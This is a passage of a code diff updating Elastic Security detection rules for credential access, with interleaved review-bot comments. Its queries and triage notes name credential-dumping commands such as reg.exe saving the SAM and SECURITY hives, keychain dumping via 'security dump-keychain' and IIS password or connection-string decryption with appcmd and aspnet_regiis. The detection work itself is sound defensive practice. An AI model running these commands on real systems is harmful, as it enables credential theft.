"## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached\ncredentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, 
which potentially indicates the\ncompromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. Check whether\nthe user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name == \"reg.exe\" and\n process.args : (\"save\", \"export\") and\n process.args : (\"hklm\\\\sam\", \"hklm\\\\security\")\n", "references": [ "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json index bb513cbebdc3f..32416c0471685 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json 
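Review bot: The rewritten `note` still carries the misspelling `legitamitely` in the false-positive paragraph ('Check whether the user is legitamitely performing this kind of activity'); since the whole string is re-emitted on the new side here, this is the place to correct it to `legitimately`. The `required_fields` list does agree with the three fields the query references (`event.type`, `process.args`, `process.pe.original_file_name`), so no further change is needed there.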
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json
@@ -16,6 +16,28 @@
 "https://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored",
 "https://www.unix.com/man-page/osx/8/mkpassdb/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "02ea4563-ec10-4974-b7de-12e65aa4f9b3",
 "severity": "high",
@@ -45,5 +67,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json
index 7b8e3af679113..7465b9105e653 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json
@@ -11,13 +11,26 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Dumping of Keychain Content via Security Command",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and process.args : \"dump-keychain\" and process.args : \"-d\"\n",
 "references": [
 "https://ss64.com/osx/security.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -52,5 +65,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_detected.json
new file mode 100644
index 0000000000000..5e0c29fd41d2f
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_detected.json
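Review bot: `"note": ""` leaves this rule with an empty investigation guide now that the Config text has moved to `setup`; an empty string is likely to be surfaced to analysts as a blank guide rather than omitted, so either drop the `note` key or give it real triage content (what `security dump-keychain -d` exposes, how to confirm the invoking user and parent process, and rotating any credentials the keychain held if the export was not sanctioned). The same empty-note pattern appears in the IIS `appcmd.exe` hunk near the end of this chunk and should be handled the same way.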
@@ -0,0 +1,78 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Elastic Endgame detected Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
+ "from": "now-15m",
+ "index": [
+ "endgame-*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "max_signals": 10000,
+ "name": "Credential Dumping - Detected - Elastic Endgame",
+ "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "571afc56-5ed9-465d-a2a9-045f099f6e7e",
+ "severity": "high",
+ "tags": [
+ "Elastic",
+ "Elastic Endgame",
+ "Threat Detection",
+ "Credential Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1003",
+ "name": "OS Credential Dumping",
+ "reference": "https://attack.mitre.org/techniques/T1003/",
+ "subtechnique": [
+ {
+ "id": "T1003.001",
+ "name": "LSASS Memory",
+ "reference": "https://attack.mitre.org/techniques/T1003/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "query",
+ "version": 9
+}
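Review bot: The new rule sets no `timestamp_override`, whereas every modified rule in this chunk carries `"timestamp_override": "event.ingested"`; with `"from": "now-15m"` and `"interval": "10m"` the lookback tolerates only about five minutes of ingest delay on the forwarded Endgame alerts, so alerts that arrive later would be silently missed. Consider adding `"timestamp_override": "event.ingested",` here and in the sibling prevented-rule file that follows. The file is added as new yet starts at `"version": 9`, which looks like a re-import of a previously removed rule — worth confirming that is intended rather than a stale value.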
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_prevented.json
new file mode 100644
index 0000000000000..e64338c07ec81
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_prevented.json
@@ -0,0 +1,78 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Elastic Endgame prevented Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
+ "from": "now-15m",
+ "index": [
+ "endgame-*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "max_signals": 10000,
+ "name": "Credential Dumping - Prevented - Elastic Endgame",
+ "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "db8c33a8-03cd-4988-9e2c-d0a4863adb13",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Elastic Endgame",
+ "Threat Detection",
+ "Credential Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1003",
+ "name": "OS Credential Dumping",
+ "reference": "https://attack.mitre.org/techniques/T1003/",
+ "subtechnique": [
+ {
+ "id": "T1003.001",
+ "name": "LSASS Memory",
+ "reference": "https://attack.mitre.org/techniques/T1003/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "query",
+ "version": 9
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json
index b66008c6931a4..913411f50f3fa 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json
@@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM User Addition to Group", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM User Addition to Group\n\nAWS Identity and Access Management (IAM) provides fine-grained access control across all of AWS. With IAM, you can specify\nwho can access which services and resources, and under which conditions. With IAM policies, you manage permissions to\nyour workforce and systems to ensure least-privilege permissions.\n\nThis rule looks for the addition of users to a specified user group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher\nconfidence. 
Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions \u2014 to\nreduce noise from onboarding processes and administrator activities.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:AddUserToGroup and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "333de828-8190-4cf5-8d7c-7575846f6fe0", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,9 @@ "AWS", "Continuous Monitoring", "SecOps", - "Identity and Access" + "Identity and Access", + "Credential Access", + "Persistence" ], "threat": [ { @@ -59,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } 
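Review bot: The new note states 'This rule looks for the addition of users to a specified user group', but the query on the context line (`event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:AddUserToGroup and event.outcome:success`) has no group condition and matches every successful AddUserToGroup call; suggest rewording to `This rule looks for the successful addition of a user to any IAM user group.` so analysts are not led to expect a group filter that does not exist. The hunk begins at the `language` line and the file's earlier fields are outside this chunk.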
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json
index 1b10f96fc54ee..77016e0b893c9 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json
@@ -13,13 +13,36 @@
 "license": "Elastic License v2",
 "max_signals": 33,
 "name": "Microsoft IIS Service Account Password Dumped",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"appcmd.exe\" or process.pe.original_file_name == \"appcmd.exe\") and \n process.args : \"/list\" and process.args : \"/text*password\"\n",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"appcmd.exe\" or process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/list\" and process.args : \"/text*password\"\n",
 "references": [
 "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -47,5 +70,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json
index cb091a5eb2ccd..e3cbeae69dbc3 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json
@@ -13,14 +13,37 @@
 "license": "Elastic License v2",
 "max_signals": 33,
 "name": "Microsoft IIS Connection Strings Decryption",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"aspnet_regiis.exe\" or process.pe.original_file_name == \"aspnet_regiis.exe\") and\n process.args : \"connectionStrings\" and process.args : \"-pdf\"\n",
 "references": [
 "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -48,5 +71,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json
index 51ae6106124a3..0e6fe41e03d2e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json
@@ -15,10 +15,48 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for\nclient/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of\ntraffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of\nKerberos tickets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. 
HTTP traffic on a\nnon-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "network where event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and\n process.executable != \"C:\\\\Windows\\\\System32\\\\lsass.exe\" and destination.address !=\"127.0.0.1\" and destination.address !=\"::1\" and\n /* insert false positives here */\n not process.name in (\"swi_fc.exe\", \"fsIPcam.exe\", \"IPCamera.exe\", \"MicrosoftEdgeCP.exe\", \"MicrosoftEdge.exe\", \"iexplore.exe\", \"chrome.exe\", \"msedge.exe\", \"opera.exe\", \"firefox.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for\nclient/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of\ntraffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of\nKerberos tickets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a\nnon-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "network where event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\") and\n destination.address !=\"127.0.0.1\" and destination.address !=\"::1\" and\n /* insert false positives here */\n not process.name in (\"swi_fc.exe\", \"fsIPcam.exe\", 
\"IPCamera.exe\", \"MicrosoftEdgeCP.exe\", \"MicrosoftEdge.exe\", \"iexplore.exe\", \"chrome.exe\", \"msedge.exe\", \"opera.exe\", \"firefox.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json index 3338895f30feb..80aa0ff7043b4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json 
@@ -2,7 +2,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets.",
+ "description": "Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets. Adversaries may attempt to dump credential material in the form of tickets that can be leveraged for lateral movement.",
 "from": "now-9m",
 "index": [
 "auditbeat-*",
@@ -16,6 +16,28 @@
 "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/kerberosdump.py",
 "https://opensource.apple.com/source/Heimdal/Heimdal-323.12/kuser/kcc-commands.in.auto.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "ad88231f-e2ab-491c-8fc6-64746da26cfe",
 "severity": "high",
@@ -57,5 +79,5 @@
 ],
